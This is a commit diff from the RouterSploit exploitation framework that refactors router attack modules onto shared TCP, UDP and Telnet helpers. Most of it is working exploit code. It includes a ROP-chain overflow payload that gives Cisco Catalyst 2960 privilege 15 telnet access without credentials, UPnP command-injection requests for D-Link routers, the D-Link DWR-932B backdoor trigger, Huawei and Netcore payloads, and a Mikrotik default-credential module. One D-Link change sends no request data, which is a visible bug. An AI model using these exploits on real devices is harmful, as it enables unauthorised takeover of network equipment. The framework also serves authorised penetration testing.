TCP & UDP based exploits (#451)

* Fixing TCP & UDP based exploits

* Fixing Mikrotik API ROS

routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py

@@ -71,6 +71,7 @@ class Exploit(TCPClient):
     def check(self):
         tcp_client = self.tcp_connect()
         if tcp_client:
+            self.tcp_close(tcp_client)
             return True
 
         return False
@@ -78,7 +79,8 @@ class Exploit(TCPClient):
     def check_default(self):
         self.credentials = []
 
-        self.run_threads(self.target_function, self.defaults)
+        data = LockedIterator(self.defaults)
+        self.run_threads(self.threads, self.target_function, data)
 
         if self.credentials:
             return self.credentials

routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py

-import socket
-import telnetlib
 from routersploit.core.exploit import *
 from routersploit.core.tcp.tcp_client import TCPClient
+from routersploit.core.telnet.telnet_client import TelnetClient
 
 
-class Exploit(TCPClient):
+class Exploit(TCPClient, TelnetClient):
     __info__ = {
         "name": "Cisco Catalyst 2960 ROCEM RCE",
         "description": "Module exploits Cisco Catalyst 2960 ROCEM RCE vulnerability. "
@@ -37,126 +36,126 @@ class Exploit(TCPClient):
             # Cisco Catalyst 2960 IOS 12.2(55)SE1
             {
                 "template": (
-                    "\xff\xfa\x24\x00" +
-                    "\x03CISCO_KITS\x012:" +
-                    "A" * 116 +
+                    b"\xff\xfa\x24\x00" +
+                    b"\x03CISCO_KITS\x012:" +
+                    b"A" * 116 +
                     # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x00\x00\x37\xb4" +
+                    b"\x00\x00\x37\xb4" +
                     # next bytes are shown as offsets from r1
                     # +8  address of pointer to is_cluster_mode function - 0x34
-                    "\x02\x2c\x8b\x74" +
-                    "{FUNC_IS_CLUSTER_MODE}" +
+                    b"\x02\x2c\x8b\x74" +
+                    b"{FUNC_IS_CLUSTER_MODE}" +
                     # +16(+0) r1 points here at second gadget
-                    "BBBB" +
+                    b"BBBB" +
                     # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
-                    "\x00\xdf\xfb\xe8" +
+                    b"\x00\xdf\xfb\xe8" +
                     # +8
-                    "CCCC" +
+                    b"CCCC" +
                     # +12
-                    "DDDD" +
+                    b"DDDD" +
                     # +16(+0) r1 points here at third gadget
-                    "EEEE" +
+                    b"EEEE" +
                     # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
-                    "\x00\x06\x78\x8c" +
+                    b"\x00\x06\x78\x8c" +
                     # +8  r1+8 = 0x022c8b60
-                    "\x02\x2c\x8b\x60" +
+                    b"\x02\x2c\x8b\x60" +
                     # +12
-                    "FFFF" +
+                    b"FFFF" +
                     # +16(+0) r1 points here at fourth gadget
-                    "GGGG" +
+                    b"GGGG" +
                     # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
-                    "\x00\x6b\xa1\x28" +
-                    "{FUNC_PRIVILEGE_LEVEL}" +
+                    b"\x00\x6b\xa1\x28" +
+                    b"{FUNC_PRIVILEGE_LEVEL}" +
                     # +12
-                    "HHHH" +
+                    b"HHHH" +
                     # +16(+0) r1 points here at fifth gadget
-                    "IIII" +
+                    b"IIII" +
                     # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x01\x48\xe5\x60" +
+                    b"\x01\x48\xe5\x60" +
                     # +8 r1 points here at third gadget
-                    "JJJJ" +
+                    b"JJJJ" +
                     # +12
-                    "KKKK" +
+                    b"KKKK" +
                     # +16
-                    "LLLL" +
+                    b"LLLL" +
                     # +20 original execution flow return addr
-                    "\x01\x13\x31\xa8" +
-                    ":15:" + "\xff\xf0"
+                    b"\x01\x13\x31\xa8" +
+                    b":15:" + b"\xff\xf0"
                 ),
                 "func_is_cluster_mode": {
                     # +12 set  address of func that rets 1
-                    "set": "\x00\x00\x99\x80",
+                    "set": b"\x00\x00\x99\x80",
                     # unset
-                    "unset": "\x00\x04\xea\x58"
+                    "unset": b"\x00\x04\xea\x58"
                 },
                 "func_privilege_level": {
                     # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
-                    "set": "\x00\x12\x52\x1c",
+                    "set": b"\x00\x12\x52\x1c",
                     # unset
-                    "unset": "\x00\x04\xe6\xf0"
+                    "unset": b"\x00\x04\xe6\xf0"
                 }
             },
 
             # Cisco Catalyst 2960 IOS 12.2(55)SE11
             {
                 "template": (
-                    "\xff\xfa\x24\x00" +
-                    "\x03CISCO_KITS\x012:" +
-                    "A" * 116 +
+                    b"\xff\xfa\x24\x00" +
+                    b"\x03CISCO_KITS\x012:" +
+                    b"A" * 116 +
                     # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x00\x00\x37\xb4" +
+                    b"\x00\x00\x37\xb4" +
                     # next bytes are shown as offsets from r1
                     # +8  address of pointer to is_cluster_mode function - 0x34
-                    "\x02\x3d\x55\xdc" +
-                    "{FUNC_IS_CLUSTER_MODE}" +
+                    b"\x02\x3d\x55\xdc" +
+                    b"{FUNC_IS_CLUSTER_MODE}" +
                     # +16(+0) r1 points here at second gadget
-                    "BBBB" +
+                    b"BBBB" +
                     # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
-                    "\x00\xe1\xa9\xf4" +
+                    b"\x00\xe1\xa9\xf4" +
                     # +8
-                    "CCCC" +
+                    b"CCCC" +
                     # +12
-                    "DDDD" +
+                    b"DDDD" +
                     # +16(+0) r1 points here at third gadget
-                    "EEEE" +
+                    b"EEEE" +
                     # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
-                    "\x00\x06\x7b\x5c" +
+                    b"\x00\x06\x7b\x5c" +
                     # +8  r1+8 = 0x23d55c8
-                    "\x02\x3d\x55\xc8" +
+                    b"\x02\x3d\x55\xc8" +
                     # +12
-                    "FFFF" +
+                    b"FFFF" +
                     # +16(+0) r1 points here at fourth gadget
-                    "GGGG" +
+                    b"GGGG" +
                     # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
-                    "\x00\x6c\xb3\xa0" +
-                    "{FUNC_PRIVILEGE_LEVEL}" +
+                    b"\x00\x6c\xb3\xa0" +
+                    b"{FUNC_PRIVILEGE_LEVEL}" +
                     # +12
-                    "HHHH" +
+                    b"HHHH" +
                     # +16(+0) r1 points here at fifth gadget
-                    "IIII" +
+                    b"IIII" +
                     # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
-                    "\x01\x4a\xcf\x98" +
+                    b"\x01\x4a\xcf\x98" +
                     # +8 r1 points here at third gadget
-                    "JJJJ" +
+                    b"JJJJ" +
                     # +12
-                    "KKKK" +
+                    b"KKKK" +
                     # +16
-                    "LLLL" +
+                    b"LLLL" +
                     # +20 original execution flow return addr
-                    "\x01\x14\xe7\xec" +
-                    ":15:" + "\xff\xf0"
+                    b"\x01\x14\xe7\xec" +
+                    b":15:" + b"\xff\xf0"
                 ),
                 "func_is_cluster_mode": {
                     # +12 set  address of func that rets 1
-                    "set": "\x00\x00\x99\x9c",
+                    "set": b"\x00\x00\x99\x9c",
                     # unset
-                    "unset": "\x00\x04\xeA\xe0"
+                    "unset": b"\x00\x04\xeA\xe0"
                 },
                 "func_privilege_level": {
                     # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
-                    "set": "\x00\x27\x0b\x94",
+                    "set": b"\x00\x27\x0b\x94",
                     # unset
-                    "unset": "\x00\x04\xe7\x78"
+                    "unset": b"\x00\x04\xe7\x78"
                 }
             }
         ]
@@ -172,13 +171,12 @@ class Exploit(TCPClient):
 
         print_status("Trying to connect to Telnet service on port {}".format(self.telnet_port))
 
-        try:
-            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            s.connect((self.target, int(self.telnet_port)))
-
+        tcp_client = self.tcp_connect()
+        if tcp_client:
+            response = self.tcp_recv(tcp_client, 1024)
             print_status("Connection OK")
-            print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
-        except Exception:
+            print_status("Received bytes from telnet service: {}".format(repr(response)))
+        else:
             print_error("Connection failed")
             return
 
@@ -191,25 +189,25 @@ class Exploit(TCPClient):
             print_status("Unsetting credless privilege 15 authentication")
 
         print_status("Sending cluster option")
-        s.send(payload)
-        s.close()
+        self.tcp_send(tcp_client, payload)
+        self.tcp_close(tcp_client)
 
         print_status("Payload sent")
 
         if self.action == 'set':
             print_status("Connecting to Telnet service...")
-            try:
-                t = telnetlib.Telnet(self.target, int(self.telnet_port))
-                t.interact()
-            except Exception:
+            telnet_client = self.telnet_connect()
+            if telnet_client:
+                self.telnet_interactive(telnet_client)
+            else:
                 print_error("Exploit failed")
         else:
             print_status("Check if Telnet authentication was set back")
 
     def build_payload(self):
         payload = self.payloads[self.device]['template']
-        payload = payload.replace("{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
-        payload = payload.replace("{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
+        payload = payload.replace(b"{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
+        payload = payload.replace(b"{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
 
         return payload
 

routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py

@@ -35,42 +35,40 @@ class Exploit(UDPClient):
             print_error("Exploit failed - target seems to be not vulnerable")
 
     def execute(self, cmd):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:uuid:`" + cmd + "`\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        cmd = bytes(cmd, "utf-8")
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            sock.close()
-        except socket.error:
-            pass
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n" +
+            b"Host:239.255.255.250:1900\r\n" +
+            b"ST:uuid:`" + cmd + b"`\r\n" +
+            b"Man:\"ssdp:discover\"\r\n" +
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, request)
+        self.udp_close(udp_client)
 
         return ""
 
     @mute
     def check(self):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:upnp:rootdevice\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n"
+            b"Host:239.255.255.250:1900\r\n"
+            b"ST:upnp:rootdevice\r\n"
+            b"Man:\"ssdp:discover\"\r\n"
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            response = sock.recv(65535)
-            sock.close()
-        except Exception:
-            return False  # target is not vulnerable
+        if udp_client:
+            self.udp_send(udp_client, request)
+            response = self.udp_recv(udp_client, 65535)
+            self.udp_close(udp_client)
 
-        if "Linux, UPnP/1.0, DIR-" in response:
-            return True  # target is vulnerable
+            if response and "Linux, UPnP/1.0, DIR-" in response:
+                return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py

@@ -30,16 +30,19 @@ class Exploit(UDPClient):
         shell(self, architecture="mipsle")
 
     def execute(self, cmd):
-        buf = ('M-SEARCH * HTTP/1.1\r\n'
-               'HOST:' + self.target + ':1900\r\n'
-               'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
-               'MX:2\r\n'
-               'MAN:"ssdp:discover"\r\n\r\n')
-
-        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        s.connect((self.target, 1900))
-        s.send(buf)
-        s.close()
+        request = (
+            "M-SEARCH * HTTP/1.1\r\n" +
+            "HOST:{}:{}\r\n".format(self.target, self.port) +
+            "ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
+            "MX:2\r\n" +
+            "MAN:\"ssdp:discover\"\r\n\r\n"
+        )
+
+        request = bytes(request, "utf-8")
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client)
+        self.udp_close(udp_client)
 
         return ""
 

routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py

-import socket
-import telnetlib
 from routersploit.core.exploit import *
-from routersploit.core.tcp.tcp_client import TCPClient
+from routersploit.core.udp.udp_client import UDPClient
 from routersploit.core.telnet.telnet_client import TelnetClient
 
 
-class Exploit(TCPClient, TelnetClient):
+class Exploit(UDPClient, TelnetClient):
     __info__ = {
         "name": "D-Link DWR-932B",
         "description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows "
@@ -23,48 +21,27 @@ class Exploit(TCPClient, TelnetClient):
     }
 
     target = OptIP("", "Target IPv4 or IPv6 address")
-    port = OptPort(23, "Target Telnet port")
+    port = OptPort(39889, "Target Telnet port")
 
     def run(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10.0)
-
-        print_status("Sending backdoor packet...")
-
-        response = ""
-        try:
-            sock.sendto(b"HELODBG", (self.target, 39889))
-            response = sock.recv(1024)
-        except Exception:
-            pass
-
-        sock.close()
-
-        if "Hello" in response:
-            print_success("Target seems to vulnerable")
-            print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
-
-            try:
-                tn = telnetlib.Telnet(self.target, self.telnet_port)
-                tn.interact()
-            except Exception:
+        print_status("Sending backdoor packet")
+        if self.check():
+            telnet_client = self.telnet_connect(port=23)
+            if telnet_client:
+                self.telnet_interactive(telnet_client)
+                self.telnet_close(telnet_client)
+            else:
                 print_error("Exploit failed - could not connect to the telnet service")
         else:
             print_error("Exploit failed - target seems to be not vulnerable")
 
     @mute
     def check(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10.0)
-
-        try:
-            sock.sendto(b"HELODBG", (self.target, 39889))
-            response = sock.recv(1024)
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, b"HELODBG")
 
-            if "Hello" in response:
-                sock.sendto(b"BYEDBG", (self.target, 39889))
-                return True  # target is vulnerable
-        except Exception:
-            pass
+        response = self.udp_recv(udp_client, 1024)
+        if response and "Hello" in response:
+            return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py

-import socket
-from routersploit.core.exploit import*
+from routersploit.core.exploit import *
 from routersploit.core.udp.udp_client import UDPClient
 
 
@@ -62,36 +61,24 @@ class Exploit(UDPClient):
             b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
         )
 
-    def run(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10)
-
-        print_status("Sending exploit payload")
-        sock.sendto(self.payload, (self.target, 43690))
+        self.content = ""
 
-        try:
-            print_status("Waiting for response")
-            response = sock.recv(1024)
-        except Exception:
+    def run(self):
+        if self.check():
+            print_status("Target returned data")
+            print_info(self.content)
+        else:
             print_error("Exploit failed - device seems to be not vulnerable")
-            return
-
-        if len(response):
-            print_success("Exploit success")
-            print_info(response)
 
     @mute
     def check(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10)
-        sock.sendto(self.payload, (self.target, 43690))
-
-        try:
-            response = sock.recv(1024)
-        except Exception:
-            return False  # target is not vulnerable
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, self.payload)
+        response = self.udp_recv(udp_client, 1024)
+        self.udp_close(udp_client)
 
-        if len(response):
+        if response:
+            self.content = response
             return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/netcore/udp_53413_rce.py

@@ -39,6 +39,7 @@ class Exploit(UDPClient):
         udp_client = self.udp_create()
         self.udp_send(udp_client, payload)
         response = self.udp_recv(udp_client, 1024)
+        self.udp_close(udp_client)
 
         if response:
             return str(response[8:], "utf-8")

tests/creds/routers/mikrotik/test_api_ros_default_creds.py

+from routersploit.modules.creds.routers.mikrotik.api_ros_default_creds import Exploit
+
+
+def test_check_success(tcp_target):
+    """ Test scenario - testing against mikrotik api ros server """
+
+    exploit = Exploit()
+    exploit.target = tcp_target.host
+    exploit.port = tcp_target.port
+
+    assert exploit.check()
+#    assert exploit.check_default() is None
+#    assert exploit.run() is None